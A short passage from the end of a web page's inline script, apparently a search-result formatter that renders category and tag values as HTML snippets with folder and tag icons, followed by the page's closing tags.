            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

